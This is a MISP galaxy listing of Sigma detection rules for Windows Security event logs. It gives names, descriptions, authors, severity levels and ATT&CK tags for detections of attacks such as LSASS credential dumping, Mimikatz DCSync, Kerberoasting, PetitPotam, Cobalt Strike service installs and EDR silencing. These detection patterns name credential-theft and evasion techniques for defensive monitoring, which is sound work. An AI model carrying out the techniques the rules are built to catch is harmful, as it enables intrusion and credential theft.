Denied Access To Remote Desktop

This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. Often, this event can be generated by attackers when searching for available windows servers in the network.

Internal MISP references

UUID 8e5c03fa-b7f0-11ea-b242-07e0576828d9 which can be used as unique global reference for Denied Access To Remote Desktop in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pushkarev Dmitry
creation_date 2020/06/27
falsepositive ['Valid user was not added to RDP group']
filename win_security_not_allowed_rdp_access.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.001']
Related clusters

To see the related clusters, click here.

HybridConnectionManager Service Installation

Rule to detect the Hybrid Connection Manager service installation.

Internal MISP references

UUID 0ee4d8a5-4e67-4faf-acfa-62a78457d1f2 which can be used as unique global reference for HybridConnectionManager Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2021/04/12
falsepositive ['Legitimate use of Hybrid Connection Manager via Azure function apps.']
filename win_security_hybridconnectionmgr_svc_installation.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1554']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation RUNDLL LAUNCHER - Security

Detects Obfuscated Powershell via RUNDLL LAUNCHER

Internal MISP references

UUID f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca which can be used as unique global reference for Invoke-Obfuscation RUNDLL LAUNCHER - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename win_security_invoke_obfuscation_via_rundll_services_security.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

AD Privileged Users or Groups Reconnaissance

Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs

Internal MISP references

UUID 35ba1d85-724d-42a3-889f-2e2362bcaf23 which can be used as unique global reference for AD Privileged Users or Groups Reconnaissance in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/04/03
falsepositive ['If source account name is not an admin then its super suspicious']
filename win_security_account_discovery.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1087.002']
Related clusters

To see the related clusters, click here.

Active Directory Replication from Non Machine Account

Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.

Internal MISP references

UUID 17d619c1-e020-4347-957e-1d1207455c93 which can be used as unique global reference for Active Directory Replication from Non Machine Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/07/26
falsepositive ['Unknown']
filename win_security_ad_replication_non_machine_account.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.006']
Related clusters

To see the related clusters, click here.

Password Protected ZIP File Opened (Email Attachment)

Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.

Internal MISP references

UUID 571498c8-908e-40b4-910b-d2369159a3da which can be used as unique global reference for Password Protected ZIP File Opened (Email Attachment) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/05/09
falsepositive ['Legitimate used of encrypted ZIP files']
filename win_security_susp_opened_encrypted_zip_outlook.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.initial_access', 'attack.t1027', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

HackTool - EDRSilencer Execution - Filter Added

Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names.

Internal MISP references

UUID 98054878-5eab-434c-85d4-72d4e5a3361b which can be used as unique global reference for HackTool - EDRSilencer Execution - Filter Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thodoris Polyzos (@SmoothDeploy)
creation_date 2024/01/29
falsepositive ['Unknown']
filename win_security_hktl_edr_silencer.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Locked Workstation

Detects locked workstation session events that occur automatically after a standard period of inactivity.

Internal MISP references

UUID 411742ad-89b0-49cb-a7b0-3971b5c1e0a4 which can be used as unique global reference for Locked Workstation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexandr Yampolskyi, SOC Prime
creation_date 2019/03/26
falsepositive ['Likely']
filename win_security_workstation_was_locked.yml
level informational
logsource.category No established category
logsource.product windows
tags ['attack.impact']

ETW Logging Disabled In .NET Processes - Registry

Potential adversaries stopping ETW providers recording loaded .NET assemblies.

Internal MISP references

UUID a4c90ea1-2634-4ca0-adbb-35eae169b6fc which can be used as unique global reference for ETW Logging Disabled In .NET Processes - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/06/05
falsepositive ['Unknown']
filename win_security_dot_net_etw_tamper.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112', 'attack.t1562']
Related clusters

To see the related clusters, click here.

SAM Registry Hive Handle Request

Detects handles requested to SAM registry hive

Internal MISP references

UUID f8748f2c-89dc-4d95-afb0-5a2dfdbad332 which can be used as unique global reference for SAM Registry Hive Handle Request in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/08/12
falsepositive ['Unknown']
filename win_security_sam_registry_hive_handle_request.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1012', 'attack.credential_access', 'attack.t1552.002']
Related clusters

To see the related clusters, click here.

SysKey Registry Keys Access

Detects handle requests and access operations to specific registry keys to calculate the SysKey

Internal MISP references

UUID 9a4ff3b8-6187-4fd2-8e8b-e0eae1129495 which can be used as unique global reference for SysKey Registry Keys Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019/08/12
falsepositive ['Unknown']
filename win_security_syskey_registry_access.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1012']
Related clusters

To see the related clusters, click here.

Suspicious Scheduled Task Creation

Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.

Internal MISP references

UUID 3a734d25-df5c-4b99-8034-af1ddb5883a4 which can be used as unique global reference for Suspicious Scheduled Task Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/05
falsepositive ['Unknown']
filename win_security_susp_scheduled_task_creation.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.persistence', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

RDP over Reverse SSH Tunnel WFP

Detects svchost hosting RDP termsvcs communicating with the loopback address

Internal MISP references

UUID 5bed80b6-b3e8-428e-a3ae-d3c757589e41 which can be used as unique global reference for RDP over Reverse SSH Tunnel WFP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Samir Bousseaden
creation_date 2019/02/16
falsepositive ['Programs that connect locally to the RDP port']
filename win_security_rdp_reverse_tunnel.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.command_and_control', 'attack.lateral_movement', 'attack.t1090.001', 'attack.t1090.002', 'attack.t1021.001', 'car.2013-07-002']
Related clusters

To see the related clusters, click here.

Azure AD Health Service Agents Registry Keys Access

This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS). Information from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation). This detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\SOFTWARE\Microsoft\ADHealthAgent. Make sure you set the SACL to propagate to its sub-keys.

Internal MISP references

UUID 1d2ab8ac-1a01-423b-9c39-001510eae8e8 which can be used as unique global reference for Azure AD Health Service Agents Registry Keys Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/08/26
falsepositive ['Unknown']
filename win_security_aadhealth_svc_agent_regkey_access.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1012']
Related clusters

To see the related clusters, click here.

Password Dumper Activity on LSASS

Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN

Internal MISP references

UUID aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c which can be used as unique global reference for Password Dumper Activity on LSASS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author sigma
creation_date 2017/02/12
falsepositive ['Unknown']
filename win_security_susp_lsass_dump.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.

Internal MISP references

UUID 25cde13e-8e20-4c29-b949-4e795b76f16f which can be used as unique global reference for Suspicious Teams Application Related ObjectAcess Event in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SerkinValery
creation_date 2022/09/16
falsepositive ['Unknown']
filename win_security_teams_suspicious_objectaccess.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1528']
Related clusters

To see the related clusters, click here.

Weak Encryption Enabled and Kerberoast

Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.

Internal MISP references

UUID f6de9536-0441-4b3f-a646-f4e00f300ffd which can be used as unique global reference for Weak Encryption Enabled and Kerberoast in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron
creation_date 2017/07/30
falsepositive ['Unknown']
filename win_security_alert_enable_weak_encryption.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

User Added to Local Administrator Group

Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity

Internal MISP references

UUID c265cf08-3f99-46c1-8d59-328247057d57 which can be used as unique global reference for User Added to Local Administrator Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/03/14
falsepositive ['Legitimate administrative activity']
filename win_security_user_added_to_local_administrators.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1078', 'attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Hidden Local User Creation

Detects the creation of a local hidden user account which should not happen for event ID 4720.

Internal MISP references

UUID 7b449a5e-1db5-4dd0-a2dc-4e3a67282538 which can be used as unique global reference for Hidden Local User Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/05/03
falsepositive ['Unknown']
filename win_security_hidden_user_creation.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1136.001']
Related clusters

To see the related clusters, click here.

Password Protected ZIP File Opened (Suspicious Filenames)

Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.

Internal MISP references

UUID 54f0434b-726f-48a1-b2aa-067df14516e4 which can be used as unique global reference for Password Protected ZIP File Opened (Suspicious Filenames) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/05/09
falsepositive ['Legitimate used of encrypted ZIP files']
filename win_security_susp_opened_encrypted_zip_filename.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.command_and_control', 'attack.defense_evasion', 'attack.t1027', 'attack.t1105', 'attack.t1036']
Related clusters

To see the related clusters, click here.

SMB Create Remote File Admin Share

Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).

Internal MISP references

UUID b210394c-ba12-4f89-9117-44a2464b9511 which can be used as unique global reference for SMB Create Remote File Admin Share in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)
creation_date 2020/08/06
falsepositive ['Unknown']
filename win_security_smb_file_creation_admin_shares.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Processes Accessing the Microphone and Webcam

Potential adversaries accessing the microphone and webcam in an endpoint.

Internal MISP references

UUID 8cd538a4-62d5-4e83-810b-12d41e428d6e which can be used as unique global reference for Processes Accessing the Microphone and Webcam in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/06/07
falsepositive ['Unknown']
filename win_security_camera_microphone_access.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.collection', 'attack.t1123']
Related clusters

To see the related clusters, click here.

Possible PetitPotam Coerce Authentication Attempt

Detect PetitPotam coerced authentication activity.

Internal MISP references

UUID 1ce8c8a3-2723-48ed-8246-906ac91061a6 which can be used as unique global reference for Possible PetitPotam Coerce Authentication Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mauricio Velazco, Michael Haag
creation_date 2021/09/02
falsepositive ['Unknown. Feedback welcomed.']
filename win_security_petitpotam_network_share.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1187']
Related clusters

To see the related clusters, click here.

Potential AD User Enumeration From Non-Machine Account

Detects read access to a domain user from a non-machine account

Internal MISP references

UUID ab6bffca-beff-4baa-af11-6733f296d57a which can be used as unique global reference for Potential AD User Enumeration From Non-Machine Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Maxime Thiebaut (@0xThiebaut)
creation_date 2020/03/30
falsepositive ['Administrators configuring new users.']
filename win_security_ad_user_enumeration.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1087.002']
Related clusters

To see the related clusters, click here.

Active Directory User Backdoors

Detects scenarios where one can control another users or computers account without having to use their credentials.

Internal MISP references

UUID 300bac00-e041-4ee2-9c36-e262656a6ecc which can be used as unique global reference for Active Directory User Backdoors in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron
creation_date 2017/04/13
falsepositive ['Unknown']
filename win_security_alert_ad_user_backdoors.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.t1098', 'attack.persistence']
Related clusters

To see the related clusters, click here.

Possible Shadow Credentials Added

Detects possible addition of shadow credentials to an active directory object.

Internal MISP references

UUID f598ea0c-c25a-4f72-a219-50c44411c791 which can be used as unique global reference for Possible Shadow Credentials Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Elastic (idea)
creation_date 2022/10/17
falsepositive ['Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)']
filename win_security_susp_possible_shadow_credentials_added.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1556']
Related clusters

To see the related clusters, click here.

WCE wceaux.dll Access

Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host

Internal MISP references

UUID 1de68c67-af5c-4097-9c85-fe5578e09e67 which can be used as unique global reference for WCE wceaux.dll Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/06/14
falsepositive ['Unknown']
filename win_security_mal_wceaux_dll.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003', 'attack.s0005']
Related clusters

To see the related clusters, click here.

CobaltStrike Service Installations - Security

Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement

Internal MISP references

UUID d7a95147-145f-4678-b85d-d1ff4a3bb3f6 which can be used as unique global reference for CobaltStrike Service Installations - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Wojciech Lesicki
creation_date 2021/05/26
falsepositive ['Unknown']
filename win_security_cobaltstrike_service_installs.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.lateral_movement', 'attack.t1021.002', 'attack.t1543.003', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

A New Trust Was Created To A Domain

Addition of domains is seldom and should be verified for legitimacy.

Internal MISP references

UUID 0255a820-e564-4e40-af2b-6ac61160335c which can be used as unique global reference for A New Trust Was Created To A Domain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2019/12/03
falsepositive ['Legitimate extension of domain structure']
filename win_security_susp_add_domain_trust.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Mimikatz DC Sync

Detects Mimikatz DC sync security events

Internal MISP references

UUID 611eab06-a145-4dfa-a295-3ccc5c20f59a which can be used as unique global reference for Mimikatz DC Sync in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu
creation_date 2018/06/03
falsepositive ['Valid DC Sync that is not covered by the filters; please report', 'Local Domain Admin account used for Azure AD Connect']
filename win_security_dcsync.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.s0002', 'attack.t1003.006']
Related clusters

To see the related clusters, click here.

Account Tampering - Suspicious Failed Logon Reasons

This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.

Internal MISP references

UUID 9eb99343-d336-4020-a3cd-67f3819e68ee which can be used as unique global reference for Account Tampering - Suspicious Failed Logon Reasons in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/02/19
falsepositive ['User using a disabled account']
filename win_security_susp_failed_logon_reasons.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.initial_access', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Service Installed By Unusual Client - Security

Detects a service installed by a client which has PID 0 or whose parent has PID 0

Internal MISP references

UUID c4e92a97-a9ff-4392-9d2d-7a4c642768ca which can be used as unique global reference for Service Installed By Unusual Client - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (Nextron Systems), Elastic (idea)
creation_date 2022/09/15
falsepositive ['Unknown']
filename win_security_service_installation_by_unusal_client.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543']
Related clusters

To see the related clusters, click here.

Enabled User Right in AD to Control User Objects

Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.

Internal MISP references

UUID 311b6ce2-7890-4383-a8c2-663a9f6b43cd which can be used as unique global reference for Enabled User Right in AD to Control User Objects in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron
creation_date 2017/07/30
falsepositive ['Unknown']
filename win_security_alert_active_directory_user_control.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Win Susp Computer Name Containing Samtheadmin

Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool

Internal MISP references

UUID 39698b3f-da92-4bc6-bfb5-645a98386e45 which can be used as unique global reference for Win Susp Computer Name Containing Samtheadmin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author elhoim
creation_date 2022/09/09
falsepositive ['Unknown']
filename win_security_susp_computer_name.yml
level critical
logsource.category No established category
logsource.product windows
tags ['cve.2021.42278', 'cve.2021.42287', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Suspicious Scheduled Task Update

Detects update to a scheduled task event that contain suspicious keywords.

Internal MISP references

UUID 614cf376-6651-47c4-9dcc-6b9527f749f4 which can be used as unique global reference for Suspicious Scheduled Task Update in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/05
falsepositive ['Unknown']
filename win_security_susp_scheduled_task_update.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.privilege_escalation', 'attack.persistence', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

DCOM InternetExplorer.Application Iertutil DLL Hijack - Security

Detects a threat actor creating a file named iertutil.dll in the C:\Program Files\Internet Explorer\ directory over the network for a DCOM InternetExplorer DLL Hijack scenario.

Internal MISP references

UUID c39f0c81-7348-4965-ab27-2fde35a1b641 which can be used as unique global reference for DCOM InternetExplorer.Application Iertutil DLL Hijack - Security in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)
creation_date 2020/10/12
falsepositive ['Unknown']
filename win_security_dcom_iertutil_dll_hijack.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002', 'attack.t1021.003']
Related clusters

To see the related clusters, click here.

Windows Filtering Platform Blocked Connection From EDR Agent Binary

Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents. Adversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events.

Internal MISP references

UUID bacf58c6-e199-4040-a94f-95dea0f1e45a which can be used as unique global reference for Windows Filtering Platform Blocked Connection From EDR Agent Binary in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @gott_cyber
creation_date 2024/01/08
falsepositive ['Unlikely']
filename win_security_wfp_endpoint_agent_blocked.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

DiagTrackEoP Default Login Username

Detects the default "UserName" used by the DiagTrackEoP POC

Internal MISP references

UUID 2111118f-7e46-4fc8-974a-59fd8ec95196 which can be used as unique global reference for DiagTrackEoP Default Login Username in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/03
falsepositive ['Unlikely']
filename win_security_diagtrack_eop_default_login_username.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation']

Pass the Hash Activity 2

Detects the attack technique pass the hash which is used to move laterally inside the network

Internal MISP references

UUID 8eef149c-bd26-49f2-9e5a-9b00e3af499b which can be used as unique global reference for Pass the Hash Activity 2 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)
creation_date 2019/06/14
falsepositive ['Administrator activity']
filename win_security_pass_the_hash_2.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1550.002']
Related clusters

To see the related clusters, click here.

Outgoing Logon with New Credentials

Detects logon events that specify new credentials

Internal MISP references

UUID def8b624-e08f-4ae1-8612-1ba21190da6b which can be used as unique global reference for Outgoing Logon with New Credentials in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2022/04/06
falsepositive ['Legitimate remote administration activity']
filename win_security_susp_logon_newcredentials.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.lateral_movement', 'attack.t1550']
Related clusters

To see the related clusters, click here.

KrbRelayUp Attack Pattern

Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like

Internal MISP references

UUID 749c9f5e-b353-4b90-a9c1-05243357ca4b which can be used as unique global reference for KrbRelayUp Attack Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SBousseaden, Florian Roth
creation_date 2022/04/27
falsepositive ['Unknown']
filename win_security_susp_krbrelayup.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.credential_access']

External Remote SMB Logon from Public IP

Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.

Internal MISP references

UUID 78d5cab4-557e-454f-9fb9-a222bd0d5edc which can be used as unique global reference for External Remote SMB Logon from Public IP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)
creation_date 2023/01/19
falsepositive ['Legitimate or intentional inbound connections from public IP addresses on the SMB port.']
filename win_security_successful_external_remote_smb_login.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.initial_access', 'attack.credential_access', 'attack.t1133', 'attack.t1078', 'attack.t1110']
Related clusters

To see the related clusters, click here.

Failed Logon From Public IP

Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.

Internal MISP references

UUID f88e112a-21aa-44bd-9b01-6ee2a2bbbed1 which can be used as unique global reference for Failed Logon From Public IP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author NVISO
creation_date 2020/05/06
falsepositive ['Legitimate logon attempts over the internet', 'IPv4-to-IPv6 mapped IPs']
filename win_security_susp_failed_logon_source.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.initial_access', 'attack.persistence', 'attack.t1078', 'attack.t1190', 'attack.t1133']
Related clusters

To see the related clusters, click here.

RDP Login from Localhost

RDP login with localhost source address may be a tunnelled login

Internal MISP references

UUID 51e33403-2a37-4d66-a574-1fda1782cc31 which can be used as unique global reference for RDP Login from Localhost in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2019/01/28
falsepositive ['Unknown']
filename win_security_rdp_localhost_login.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'car.2013-07-002', 'attack.t1021.001']
Related clusters

To see the related clusters, click here.

A Security-Enabled Global Group Was Deleted

Detects activity when a security-enabled global group is deleted

Internal MISP references

UUID b237c54b-0f15-4612-a819-44b735e0de27 which can be used as unique global reference for A Security-Enabled Global Group Was Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexandr Yampolskyi, SOC Prime
creation_date 2023/04/26
falsepositive ['Unknown']
filename win_security_security_enabled_global_group_deleted.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Successful Account Login Via WMI

Detects successful logon attempts performed with WMI

Internal MISP references

UUID 5af54681-df95-4c26-854f-2565e13cfab0 which can be used as unique global reference for Successful Account Login Via WMI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2019/12/04
falsepositive ['Monitoring tools', 'Legitimate system administration']
filename win_security_susp_wmi_login.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Potential Access Token Abuse

Detects potential token impersonation and theft. Example, when using "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS flag".

Internal MISP references

UUID 02f7c9c1-1ae8-4c6a-8add-04693807f92f which can be used as unique global reference for Potential Access Token Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michaela Adams, Zach Mathis
creation_date 2022/11/06
falsepositive ['Anti-Virus']
filename win_security_access_token_abuse.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1134.001', 'stp.4u']
Related clusters

To see the related clusters, click here.

A Member Was Removed From a Security-Enabled Global Group

Detects activity when a member is removed from a security-enabled global group

Internal MISP references

UUID 02c39d30-02b5-45d2-b435-8aebfe5a8629 which can be used as unique global reference for A Member Was Removed From a Security-Enabled Global Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexandr Yampolskyi, SOC Prime
creation_date 2023/04/26
falsepositive ['Unknown']
filename win_security_member_removed_security_enabled_global_group.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

RottenPotato Like Attack Pattern

Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like

Internal MISP references

UUID 16f5d8ca-44bd-47c8-acbe-6fc95a16c12f which can be used as unique global reference for RottenPotato Like Attack Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SBousseaden, Florian Roth
creation_date 2019/11/15
falsepositive ['Unknown']
filename win_security_susp_rottenpotato.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.credential_access', 'attack.t1557.001']
Related clusters

To see the related clusters, click here.

Remote WMI ActiveScriptEventConsumers

Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network

Internal MISP references

UUID 9599c180-e3a8-4743-8f92-7fb96d3be648 which can be used as unique global reference for Remote WMI ActiveScriptEventConsumers in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/09/02
falsepositive ['SCCM']
filename win_security_scrcons_remote_wmi_scripteventconsumer.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.privilege_escalation', 'attack.persistence', 'attack.t1546.003']
Related clusters

To see the related clusters, click here.

